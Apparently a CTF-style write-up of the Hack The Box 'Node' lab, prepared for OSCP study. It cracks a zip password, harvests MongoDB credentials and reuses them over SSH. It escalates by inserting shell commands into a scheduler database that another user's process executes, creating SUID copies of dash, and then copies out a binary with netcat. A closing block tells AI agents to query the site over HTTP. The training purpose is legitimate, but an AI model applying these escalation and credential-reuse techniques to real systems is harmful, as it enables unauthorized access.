# Exploitation ## Logging in with found Credentials ![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MJbIvreYUlIOZBdHrES%2F-MJbJSsTx5_U1B_TN0X7%2Fimage.png?alt=media\&token=37eb20b1-6696-4069-9db3-8d9c104d47b2) Downloading the file and trying to read it shows us that it is base64. decoding the file with a different name shows us that the file is a zip file and trying to unzip the file shows us that it needs a password. These are the following commands to get this done. ``` less [file name] base64 -d [filename] > [new file name] file [new file name] unzip [new file name] ``` The file needs a password, therefore we're going to brute force the zip file using fcrackzip ``` kali@kali:~/HTB/node$ fcrackzip -D -p /usr/share/wordlists/rockyou.txt test.zip possible pw found: magicword () ``` * password is magicword ## Found source code While analyzing the source code, something that we want to do is a find a password we can search for passwords by typing the following command ``` kali@kali:~/HTB/node/var/www/myplace$ grep -Ri password grep -Ri password . //specifies in current directory and list everything grep -Ri password . | less /less output, easier to read. ``` After looking through the source code not much stood out, but we did notice that it ran mongodb ![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MJbbDpddo6oERnW-xyz%2F-MJg6RsAH23V1mG5B9s8%2Fimage.png?alt=media\&token=a4b0d6a5-1a66-4de7-bae3-57944e528fef) In order to figure out where the mongo connection is controlled, we can look at app.js ``` less app.js /mongo ``` ![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MJbbDpddo6oERnW-xyz%2F-MJg8lSURs9ac8OgHwMR%2Fimage.png?alt=media\&token=ab172ee9-a2f4-4ebf-aa13-e1a57f7371cf) ### Found Username and password * Username: mark * Password: 5AYRft73VtFpc84k ## Initial Access After obtaing mongo db password, we attempt to SSH and it worked. Mark was using the same credentials for SSH and MongoDB. Bad practice Mark, bad practice. ![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MJbbDpddo6oERnW-xyz%2F-MJg9ptpV-3yBc0jpGOk%2Fimage.png?alt=media\&token=d86492eb-1c9e-4676-a86d-045c51b24180) ### Pivoting to TOM After running LinEnum.sh somthing that stood out is teh running process running as tom. ![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MJgAFidlGr74txGOAel%2F-MJgIGKm5xQ4R8a5SVI6%2Fimage.png?alt=media\&token=0778034b-8444-4c5c-ae88-7bbf9a429e86) * Node scheduler running as tom. looking at it Reading that file we are able to find credentials. The script takes everything in the task selection and passes it through exec. ![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MJgAFidlGr74txGOAel%2F-MJgK2bmUY4JR226Uetl%2Fimage.png?alt=media\&token=2decb1f9-a6d0-431b-8525-71ef20f03736) * username: mark * password: 5AYRft73VtFpc84k ## PrivEsc to Tom User ``` mongo -p -u mark scheduler >db.tasks >db.tasks.in >db.tasks.insert( { "cmd" : "cp /bin/dash /tmp/boomer; chmod 6755 /bin/dash;" } ) >db.tasks.find() ls -la /tmp/boomer ``` That first one did not work, however retyping with different stickbits (hope thats right) we are able to escalate to tom ``` mark@node:/dev/shm$ mongo -p -u mark scheduler MongoDB shell version: 3.2.16 Enter password: connecting to: scheduler > db.tasks.in scheduler.tasks.in > db.tasks.insert ( { "cmd" : "chmod u+s /tmp/boomer" } ) WriteResult({ "nInserted" : 1 }) > db.find() 2020-10-15T14:27:25.393+0100 E QUERY [thread1] TypeError: db.find is not a function : @(shell):1:1 > db.tasks.find() > ^C bye mark@node:/dev/shm$ ls -la /tmp/boomer -rwsr-xr-x 1 tom tom 154072 Oct 15 14:20 /tmp/boomer mark@node:/dev/shm$ /tmp/boomer -p $ id uid=1001(mark) gid=1001(mark) euid=1000(tom) groups=1001(mark) $ whoami tom $ ``` It would be ideal in this case to drop an ssh key so you can login as tom, unfortanetley, we don't have permissions to do so. So we will run LinEnum on it once more to see if we have any other findings. ## PrivEsc to admin group After running a more thourough nmap scan, we are able to look at the SUID's. ``` bash LinEnum.sh -t ``` something that stood out: ![](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MJgKguVxEX2ihyLYUwk%2F-MJgThfcJgrbTpmSr_Xq%2Fimage.png?alt=media\&token=e4371850-0fa2-476e-baf0-c77c6691e2ef) looks to be owned by root and is in the admin group. To PrivEsc into the admin group we will have to go through mongo db. ``` $ mongo -p -u mark scheduler MongoDB shell version: 3.2.16 Enter password: connecting to: scheduler > db.tasks scheduler.tasks > db.tasks.insert( { "cmd" : "chown tom:admin /tmp/boomer; chmod 6755 /tmp/boomer;" } ) WriteResult({ "nInserted" : 1 }) > db.find() 2020-10-15T14:56:39.165+0100 E QUERY [thread1] TypeError: db.find is not a function : @(shell):1:1 > db.tasks.find() > ^C bye $ /tmp/boomer -p $ id uid=1001(mark) gid=1001(mark) euid=1000(tom) egid=1002(admin) groups=1002(admin),1001(mark) $ ``` Successful PrivEsc of group. Now that we are in the admin group we can acess usr/local/bin/backup we will use netcat to transfer since this is a big boi. On our machine set up a listner as so. ``` nc -lvnp 8081 > backup ``` On the target machine: ``` nc [ip] [port] < /usr/local/bin/backup <--This is the file we are going to transfer. ``` ## Analyzing Backup Binary File ``` strace ./backup // nothing intersting kali@kali:~/HTB/node$ r2 backup [0x08048780]> aaa [x] Analyze all flags starting with sym. and entry0 (aa) [x] Analyze function calls (aac) [x] Analyze len bytes of instructions for references (aar) [x] Check for objc references [x] Check for vtables [x] Type matching analysis for all functions (aaft) [x] Propagate noreturn information [x] Use -AA or aaaa to perform additional experimental analysis. >aaa >afl prints out function >vvv visualization mode ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://manuelvazquez-contact.gitbook.io/oscp-prep/hack-the-box/node/exploitation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.